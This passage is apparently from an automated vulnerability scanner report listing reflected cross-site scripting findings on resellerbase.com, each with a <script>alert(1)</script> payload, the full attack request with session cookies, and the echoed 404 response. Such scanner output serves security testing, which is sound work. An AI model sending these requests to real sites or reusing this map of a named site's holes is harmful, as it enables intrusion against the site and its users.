HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf43b4<script>alert(1)</script>9deb24032ad/13/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1108. http://www.resellerbase.com/detail/13/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 17e14<script>alert(1)</script>c1cbe1796e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1317e14<script>alert(1)</script>c1cbe1796e0/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1317e14<script>alert(1)</script>c1cbe1796e0/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1109. http://www.resellerbase.com/detail/13/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8719f<script>alert(1)</script>6bff6a1aa68 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/themes8719f<script>alert(1)</script>6bff6a1aa68/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/themes8719f<script>alert(1)</script>6bff6a1aa68/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1110. http://www.resellerbase.com/detail/13/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a3c47<script>alert(1)</script>3edfc5b4d9c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/themes/kosmosa3c47<script>alert(1)</script>3edfc5b4d9c/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/themes/kosmosa3c47<script>alert(1)</script>3edfc5b4d9c/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1111. http://www.resellerbase.com/detail/13/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2f1c1<script>alert(1)</script>02cff8f7ce was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/themes/kosmos/images2f1c1<script>alert(1)</script>02cff8f7ce/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/themes/kosmos/images2f1c1<script>alert(1)</script>02cff8f7ce/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1112. http://www.resellerbase.com/detail/13/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5d4a1<script>alert(1)</script>bf76be42363 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/themes/kosmos/images/rating5d4a1<script>alert(1)</script>bf76be42363/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/themes/kosmos/images/rating5d4a1<script>alert(1)</script>bf76be42363/0.gif was not found on this server.</p>
...[SNIP]...

2.1113. http://www.resellerbase.com/detail/13/themes/kosmos/images/rating/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 26704<script>alert(1)</script>5078f5ef7be was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/themes/kosmos/images/rating/0.gif26704<script>alert(1)</script>5078f5ef7be HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/themes/kosmos/images/rating/0.gif26704<script>alert(1)</script>5078f5ef7be was not found on this server.</p>
...[SNIP]...

2.1114. http://www.resellerbase.com/detail/13/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 941da<script>alert(1)</script>1c77daabb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/themes/kosmos/images/rating/0.gif?941da<script>alert(1)</script>1c77daabb2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/themes/kosmos/images/rating/0.gif?941da<script>alert(1)</script>1c77daabb2=1 was not found on this server.</p>
...[SNIP]...

2.1115. http://www.resellerbase.com/detail/14/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 55df1<script>alert(1)</script>e03d4136324 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail55df1<script>alert(1)</script>e03d4136324/14/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail55df1<script>alert(1)</script>e03d4136324/14/ was not found on this server.</p>
...[SNIP]...

2.1116. http://www.resellerbase.com/detail/14/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2eb56<script>alert(1)</script>0fde6e27157 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/142eb56<script>alert(1)</script>0fde6e27157/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/142eb56<script>alert(1)</script>0fde6e27157/ was not found on this server.</p>
...[SNIP]...

2.1117. http://www.resellerbase.com/detail/14/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload af2e1<script>alert(1)</script>8694570e64f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/?af2e1<script>alert(1)</script>8694570e64f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/?af2e1<script>alert(1)</script>8694570e64f=1 was not found on this server.</p>
...[SNIP]...

2.1118. http://www.resellerbase.com/detail/14/datingrev-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/datingrev-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c4c29<script>alert(1)</script>42008f864ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc4c29<script>alert(1)</script>42008f864ae/14/datingrev-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc4c29<script>alert(1)</script>42008f864ae/14/datingrev-com.html was not found on this server.</p>
...[SNIP]...

2.1119. http://www.resellerbase.com/detail/14/datingrev-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/14/datingrev-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1a326<a>ce38da080d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/141a326<a>ce38da080d2/datingrev-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/141a326<a>ce38da080d2/datingrev-com.html was not found on this server.</p>
...[SNIP]...

2.1120. http://www.resellerbase.com/detail/14/datingrev-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/datingrev-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f1bed<script>alert(1)</script>1368baf4c64 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/f1bed<script>alert(1)</script>1368baf4c64 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/f1bed<script>alert(1)</script>1368baf4c64 was not found on this server.</p>
...[SNIP]...

2.1121. http://www.resellerbase.com/detail/14/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e7d62<script>alert(1)</script>24e750c2bed435e88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detaile7d62<script>alert(1)</script>24e750c2bed435e88/14/rating.php?id=14&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile7d62<script>alert(1)</script>24e750c2bed435e88/14/rating.php?id=14&rating=5 was not found on this server.</p>
...[SNIP]...

2.1122. http://www.resellerbase.com/detail/14/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc278<script>alert(1)</script>78fae996c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailcc278<script>alert(1)</script>78fae996c8/14/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailcc278<script>alert(1)</script>78fae996c8/14/rating.php was not found on this server.</p>
...[SNIP]...

2.1123. http://www.resellerbase.com/detail/14/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 665dd<script>alert(1)</script>f62439e47601b2ecf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/14665dd<script>alert(1)</script>f62439e47601b2ecf/rating.php?id=14&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14665dd<script>alert(1)</script>f62439e47601b2ecf/rating.php?id=14&rating=5 was not found on this server.</p>
...[SNIP]...

2.1124. http://www.resellerbase.com/detail/14/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ffc10<script>alert(1)</script>e13095e7a7c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14ffc10<script>alert(1)</script>e13095e7a7c/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14ffc10<script>alert(1)</script>e13095e7a7c/rating.php was not found on this server.</p>
...[SNIP]...

2.1125. http://www.resellerbase.com/detail/14/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2001b<script>alert(1)</script>ae285068959f30304 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/14/rating.php2001b<script>alert(1)</script>ae285068959f30304?id=14&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/rating.php2001b<script>alert(1)</script>ae285068959f30304?id=14&rating=5 was not found on this server.</p>
...[SNIP]...

2.1126. http://www.resellerbase.com/detail/14/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cb011<script>alert(1)</script>de6fd049c74 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/rating.phpcb011<script>alert(1)</script>de6fd049c74 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/rating.phpcb011<script>alert(1)</script>de6fd049c74 was not found on this server.</p>
...[SNIP]...

2.1127. http://www.resellerbase.com/detail/14/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/rating.php

Issue detail

